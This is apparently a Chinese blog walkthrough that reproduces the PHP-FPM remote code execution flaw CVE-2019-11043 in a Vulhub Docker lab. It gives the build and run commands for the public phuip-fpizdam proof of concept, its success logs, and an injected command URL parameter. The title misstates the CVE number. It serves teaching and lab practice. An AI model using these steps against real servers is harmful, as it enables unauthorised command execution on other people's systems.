漏洞利用-CVE-2019-11403[待编辑]

Mia

February 28, 2021

895views

No comments

1278 words

网络安全

PHP远程代码执行漏洞 CVE-2019-11043

PHP5.4版本未受影响，PHP5.6以上版本会造成服务崩溃，PHP7.0以上版本可以执行远程命令执行

漏洞原理和介绍

https://www.freebuf.com/articles/web/217836.html

漏洞环境搭建

利用VulHub项目，使用Docker搭建漏洞环境

下载 CVE-2019-11043的漏洞环境并部署

https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043

#Git克隆可能会失败，可以直接下载，将其解压到目标服务器，此处直接在VulHub环境里面运行了

进入项目目录后，开启容器

docker-compose up -d

此时即可访问目标地址，IP为容器实际IP

http://192.168.36.133:8080/index.php

#查看容器进程

docker ps

#结束容器进程

docker stop 容器进程的ID

漏洞复现

Windows环境，已安装Go编译环境

下载POC，https://github.com/neex/phuip-fpizdam

解压该项目文件，以管理员身份运行cmd进入项目目录，在项目目录内执行go
build编译项目

编译完成后执行该exe文件，其中后缀url即有漏洞的地址，注意要带实际php文件

E:\Downloads\phuip-fpizdam-master>phuip-fpizdam.exe "http://192.168.36.133:8080/index.php"

运行成功结果如下

E:\Downloads\phuip-fpizdam-master>phuip-fpizdam.exe "http://192.168.36.133:8080/index.php" 2019/11/08 16:40:46 Base status code is 200 2019/11/08 16:40:46 Status code 502 for qsl=1800, adding as a candidate 2019/11/08 16:40:46 The target is probably vulnerable. Possible QSLs: [1790 1795 1800] 2019/11/08 16:40:46 Attack params found: --qsl 1790 --pisos 35 --skip-detect 2019/11/08 16:40:46 Trying to set "session.auto_start=0"... 2019/11/08 16:40:46 Detect() returned attack params: --qsl 1790 --pisos 35 --skip-detect <-- REMEMBER THIS 2019/11/08 16:40:46 Performing attack using php.ini settings... 2019/11/08 16:40:46 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs 2019/11/08 16:40:46 Trying to cleanup /tmp/a... 2019/11/08 16:40:46 Done!

执行成功后，可以带命令参数访问目标URL

http://192.168.36.133:8080/index.php?a=date

命令执行的结果可回显到页面上

#Kali环境，已安装Go编译环境

下载安装Go语言编译环境

apt-get install golang-go -y

下载POC项目

git clone https://github.com/neex/phuip-fpizdam

进入下载好后的项目，执行go build进行无参数编译

#进行无参数编译的时候注意首先确保DNS解析可达

编译成功后运行POC，注入Payload激发漏洞

./phuip-fpizdam http://192.168.36.81:8080/index.php

执行成功后结果如下

2019/11/08 03:55:23 Base status code is 200 2019/11/08 03:55:24 Status code 502 for qsl=1795, adding as a candidate 2019/11/08 03:55:24 The target is probably vulnerable. Possible QSLs: [1785 1790 1795] 2019/11/08 03:55:24 Attack params found: --qsl 1790 --pisos 243 --skip-detect 2019/11/08 03:55:24 Trying to set "session.auto_start=0"... 2019/11/08 03:55:25 Detect() returned attack params: --qsl 1790 --pisos 243 --skip-detect <-- REMEMBER THIS 2019/11/08 03:55:25 Performing attack using php.ini settings... 2019/11/08 03:55:25 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs 2019/11/08 03:55:25 Trying to cleanup /tmp/a… 2019/11/08 03:55:25 Done!

执行成功后，可以带命令参数访问目标URL